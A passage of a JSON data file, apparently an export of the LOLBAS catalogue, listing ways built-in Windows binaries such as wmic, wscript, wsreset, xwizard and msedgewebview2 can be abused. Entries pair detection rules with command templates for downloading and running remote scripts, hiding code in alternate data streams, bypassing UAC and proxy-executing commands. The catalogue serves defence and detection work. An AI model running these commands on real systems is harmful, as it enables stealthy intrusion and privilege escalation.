file.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wmic-exe:6","toolId":"lolbas:wmic-exe","toolName":"Wmic.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"WMIC.exe /Namespace:\\\\\\\\root\\\\SecurityCenter2 Path AntiVirusProduct Get displayName,productState","description":"Executes WMIC to gather the existing Antivirus or EDR solution installed on the machine.","usecase":"Recon","mitre":["T1518.001"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wbem\\wmic.exe","C:\\Windows\\SysWOW64\\wbem\\wmic.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wmic retrieving scripts from remote system/Internet location"},{"type":"IOC","value":"DotNet CLR libraries loaded into wmic.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wmic.exe.log"},{"type":"IOC","value":"wmiprvse.exe writing files"}],"references":["https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory","https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html","https://twitter.com/subTee/status/986234811944648707","https://research.kudelskisecurity.com/2025/04/30/unmasking-blackbasta-inside-the-ransomware-syndicates-leaked-operations/","https://lolbas-project.github.io/lolbas/Binaries/Wmic/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:workfolders-exe:0","toolId":"lolbas:workfolders-exe","toolName":"WorkFolders.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"WorkFolders","description":"Execute `control.exe` in the current working directory","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\WorkFolders.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml"},{"type":"IOC","value":"WorkFolders.exe should not be run on a normal workstation"},{"type":"IOC","value":"Registry modification to HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe"}],"references":["https://www.ctus.io/2021/04/12/exploading/","https://twitter.com/ElliotKillick/status/1449812843772227588","https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:workfolders-exe:1","toolId":"lolbas:workfolders-exe","toolName":"WorkFolders.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"WorkFolders","description":"`WorkFolders` attempts to execute `control.exe`. By modifying the default value of the App Paths registry key for `control.exe` in `HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe`, an attacker can achieve proxy execution.","usecase":"Proxy execution of a malicious payload via App Paths registry hijacking.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\WorkFolders.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml"},{"type":"IOC","value":"WorkFolders.exe should not be run on a normal workstation"},{"type":"IOC","value":"Registry modification to HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe"}],"references":["https://www.ctus.io/2021/04/12/exploading/","https://twitter.com/ElliotKillick/status/1449812843772227588","https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wscript-exe:0","toolId":"lolbas:wscript-exe","toolName":"Wscript.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"wscript //e:vbscript {PATH}:script.vbs","description":"Execute script stored in an alternate data stream","usecase":"Execute hidden code to evade defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wscript.exe","C:\\Windows\\SysWOW64\\wscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wscript.exe executing code from alternate data streams"},{"type":"IOC","value":"DotNet CLR libraries loaded into wscript.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wscript.exe.log"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Wscript/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wscript-exe:1","toolId":"lolbas:wscript-exe","toolName":"Wscript.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"echo GetObject(\"script:{REMOTEURL:.js}\") > {PATH_ABSOLUTE}:hi.js && wscript.exe {PATH_ABSOLUTE}:hi.js","description":"Download and execute script stored in an alternate data stream","usecase":"Execute hidden code to evade defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wscript.exe","C:\\Windows\\SysWOW64\\wscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Wscript.exe executing code from alternate data streams"},{"type":"IOC","value":"DotNet CLR libraries loaded into wscript.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - wscript.exe.log"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Wscript/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wsreset-exe:0","toolId":"lolbas:wsreset-exe","toolName":"Wsreset.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"wsreset.exe","description":"During startup, wsreset.exe checks the registry value HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsreset.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml#"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/wsreset_uac_bypass.yml"},{"type":"IOC","value":"wsreset.exe launching child process other than mmc.exe"},{"type":"IOC","value":"Creation or modification of the registry value HKCU\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"},{"type":"IOC","value":"Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen"}],"references":["https://www.activecyber.us/activelabs/windows-uac-bypass","https://twitter.com/ihack4falafel/status/1106644790114947073","https://github.com/hfiref0x/UACME/blob/master/README.md","https://lolbas-project.github.io/lolbas/Binaries/Wsreset/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:wuauclt-exe:0","toolId":"lolbas:wuauclt-exe","toolName":"wuauclt.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wuauclt.exe /UpdateDeploymentProvider {PATH_ABSOLUTE:.dll} /RunHandlerComServer","description":"Loads and executes DLL code on attach.","usecase":"Execute dll via attach/detach methods","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wuauclt.exe","C:\\Windows\\UUS\\amd64\\wuauclt.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wuauclt_execution.yml"},{"type":"IOC","value":"wuauclt run with a parameter of a DLL path"},{"type":"IOC","value":"Suspicious wuauclt Internet/network connections"}],"references":["https://dtm.uk/wuauclt/","https://lolbas-project.github.io/lolbas/Binaries/wuauclt/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:xwizard-exe:0","toolId":"lolbas:xwizard-exe","toolName":"Xwizard.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}","description":"Xwizard.exe running a custom class that has been added to the registry.","usecase":"Run a com object created in registry to evade defensive counter measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\xwizard.exe","C:\\Windows\\SysWOW64\\xwizard.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/execution_com_object_xwizard.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"}],"references":["http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/","https://www.youtube.com/watch?v=LwDHX7DVHWU","https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5","https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://twitter.com/notwhickey/status/1306023056847110144","https://lolbas-project.github.io/lolbas/Binaries/Xwizard/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:xwizard-exe:1","toolId":"lolbas:xwizard-exe","toolName":"Xwizard.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}","description":"Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.","usecase":"Run a com object created in registry to evade defensive counter measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\xwizard.exe","C:\\Windows\\SysWOW64\\xwizard.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/execution_com_object_xwizard.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"}],"references":["http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/","https://www.youtube.com/watch?v=LwDHX7DVHWU","https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5","https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://twitter.com/notwhickey/status/1306023056847110144","https://lolbas-project.github.io/lolbas/Binaries/Xwizard/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:xwizard-exe:2","toolId":"lolbas:xwizard-exe","toolName":"Xwizard.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z{REMOTEURL}","description":"Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\xwizard.exe","C:\\Windows\\SysWOW64\\xwizard.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/execution_com_object_xwizard.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"}],"references":["http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/","https://www.youtube.com/watch?v=LwDHX7DVHWU","https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5","https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/","https://twitter.com/notwhickey/status/1306023056847110144","https://lolbas-project.github.io/lolbas/Binaries/Xwizard/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msedge-proxy-exe:0","toolId":"lolbas:msedge-proxy-exe","toolName":"msedge_proxy.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe {REMOTEURL:.zip}","description":"msedge_proxy will download malicious file.","usecase":"Download file from the internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msedge-proxy-exe:1","toolId":"lolbas:msedge-proxy-exe","toolName":"msedge_proxy.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"","description":"msedge_proxy.exe will execute file in the background","usecase":"Executes a process under a trusted Microsoft signed binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msedgewebview2-exe:0","toolId":"lolbas:msedgewebview2-exe","toolName":"msedgewebview2.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msedgewebview2.exe --no-sandbox --browser-subprocess-path=\"{PATH_ABSOLUTE:.exe}\"","description":"This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified executable as its subprocess.","usecase":"Proxy execution of binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe","C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\131.0.2903.70\\msedgewebview2.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"},{"type":"IOC","value":"msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path"}],"references":["https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf","https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msedgewebview2-exe:1","toolId":"lolbas:msedgewebview2-exe","toolName":"msedgewebview2.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msedgewebview2.exe --utility-cmd-prefix=\"{CMD}\"","description":"This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess.","usecase":"Proxy execution of binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe","C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\131.0.2903.70\\msedgewebview2.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"},{"type":"IOC","value":"msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path"}],"references":["https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf","https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msedgewebview2-exe:2","toolId":"lolbas:msedgewebview2-exe","toolName":"msedgewebview2.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD}\"","description":"This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess.","usecase":"Proxy execution of binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe","C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\131.0.2903.70\\msedgewebview2.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"},{"type":"IOC","value":"msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path"}],"references":["https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf","https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:msedgewebview2-exe:3","toolId":"lolbas:msedgewebview2-exe","toolName":"msedgewebview2.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msedgewebview2.exe --no-sandbox --renderer-cmd-prefix=\"{CMD}\"","description":"This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn the specified command as its subprocess.","usecase":"Proxy execution of binary","mitre":["T1218.015"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\114.0.1823.43\\msedgewebview2.exe","C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\131.0.2903.70\\msedgewebview2.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_susp_electron_execution_proxy.yml"},{"type":"IOC","value":"msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, 